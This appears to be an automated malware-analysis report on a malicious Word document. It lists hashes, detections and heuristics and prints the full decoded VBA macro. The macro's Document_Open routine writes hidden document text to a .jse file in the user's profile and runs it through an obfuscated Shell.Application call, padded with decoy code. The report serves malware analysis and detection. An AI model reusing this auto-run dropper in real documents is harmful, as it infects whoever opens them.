Office (OOXML) malware analysis — malicious · eb5a049f08a0f6eb

MALICIOUS

Office (OOXML)

87.4 KB Created: 2019-10-27 18:57:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-02-04

MD5: 9e36b415211b9672bb3093f390e571e5 SHA-1: 86657f93dd60e1f41a9d61f6e918349bb7cd1a10 SHA-256: eb5a049f08a0f6eb28b38e0ccdb7db6e8cdd84d33be45ed02201c9ead438d6f0

298 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OOXML document containing a malicious VBA macro, specifically a Document_Open macro that uses CreateObject to execute code. ClamAV detections indicate it is a downloader, likely for a second-stage payload. The VBA code is obfuscated and uses a custom decoder, typical of malware designed to evade static analysis.

Heuristics 8

ClamAV: Doc.Downloader.Sdrop-7478698-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sdrop-7478698-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
    Set gEha = CreateObject(Mid(grag + grag2, 17, 17))
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set gEha = CreateObject(Mid(grag + grag2, 17, 17))
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Sub
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    contentGet = Mid(contentGet, 1, Len(contentGet) - 2)
    startCont = Environ(myCollect(1) & myCollect(2) & myCollect(3) & myCollect(4)) & Chr(92) & Rnd & ".jse"

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4327 bytes
SHA-256: `1169c4a701d69c7d5269eb6720fe8ca458aaae20887182df4afc9fc2c84d280d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub MyFindNext() Dim wP7pLl4C561Y As String wP7pLl4C561Y = "born instant call chance loud car straight because everybody solid cake route telephone biggest or fair pay high further paid his shoot bus element foreign mostly claws castle warm father cool gain shirt make lovely test consist stop newspaper seldom source chicken life hill collect however report led saved powerful hundred compare apart dry excited syllable whether sale remarkable beat political dirty mad helpful continued living rod pole house copper brother day car softly quietly close setting nine from straight cutting force dirty circle sad close proper organized herself seems development far bet opportunity belong into entire drop addition cabin newspaper bit soon famous us anybody needs save rabbit brief jack shells song religious mail live pocket" Application.ScreenUpdating = False Selection.Find.Execute ActiveDocument.Bookmarks.Add Range:=Selection.Range, Name:="MyFound" Selection.MoveUp Unit:=wdLine, Count:=3 Selection.GoTo What:=wdGoToBookmark, Name:="MyFound" ActiveDocument.Bookmarks("MyFound").Delete Application.ScreenUpdating = True End Sub Private Sub Document_Open() Randomize Dim myCollect As New Collection myCollect.Add "US" myCollect.Add "ERP" myCollect.Add "RO" myCollect.Add "FILE" Dim dataRng As Range Set dataRng = ActiveDocument.Tables(1).Cell(1, 1).Range dataRng.TextRetrievalMode.IncludeHiddenText = True Dim contentGet As String contentGet = dataRng.Text contentGet = Mid(contentGet, 1, Len(contentGet) - 2) startCont = Environ(myCollect(1) & myCollect(2) & myCollect(3) & myCollect(4)) & Chr(92) & Rnd & ".jse" Open startCont For Output As #44 Print #44, contentGet Close #44 Dim grag As String Dim grag2 As String grag = "dsfgergjwalr;gawShell." grag2 = "Applicationasgwareg" Set gEha = CreateObject(Mid(grag + grag2, 17, 17)) gEha.ShellExecute startCont, "", "C:\", "open", 1 End Sub Sub ListAllFonts() Dim J As Integer Dim FontTable As Table 'Start off with a new document Set NewDoc = Documents.Add 'Add a table and set the table header Set FontTable = NewDoc.Tables.Add(Selection.Range, FontNames.Count + 1, 2) With FontTable .Borders.Enable = False .Cell(1, 1).Range.Font.Name = "Arial" .Cell(1, 1).Range.Font.Bold = 1 .Cell(1, 1).Range.InsertAfter "Font Name" .Cell(1, 2).Range.Font.Name = "Arial" .Cell(1, 2).Range.Font.Bold = 1 .Cell(1, 2).Range.InsertAfter "Font Example" End With Dim ccr5744x0BR2 As String ccr5744x0BR2 = "passage society represent consider buried spell group down alone package rope fear swung sudden available flag chain home exercise giving into enough send sharp shoe would highway safe scientist mix fish thrown memory alive bit scientific burn earn various bent field mood influence soap far definition shaking exercise wire brief pen become believed giant represent thing addition summer failed visitor deer seen strong willing forth underline smell figure extra pig farther does bowl coffee longer dog number ball market dried war observe flow leather way nation climate pleasure wealth taught somehow brush combination box alone forward actually flat worker sweet root hope bend running enjoy table muscle serve park we food religious fog people" 'Go through all the fonts and add them to the table For J = 1 To FontNames.Count With FontTable .Cell(J + 1, 1).Range.Font.Name = "Arial" .Cell(J + 1, 1).Range.Font.Size = 10 .Cell(J + 1, 1).Range.InsertAfter FontNames(J) .Cell(J + 1, 2).Range.Font.Name = FontNames(J) .Cell(J + 1, 2).Range.Font.Size = 10 .Cell(J + 1, 2).Range.InsertAfter "ABCDEFG abcdefg 1234567890" End With Next J FontTable.Sort SortOrder:=wdSortOrderAscending End Sub Attribute VB_Name = "NewMacros" Sub n() End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	31232 bytes
SHA-256: `4fda1ee556aa8a3b65553bacf7589c11602240cd460ef6d3fe45a8085d8ded7a`
Detection ClamAV: Doc.Downloader.Sdrop-7478698-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.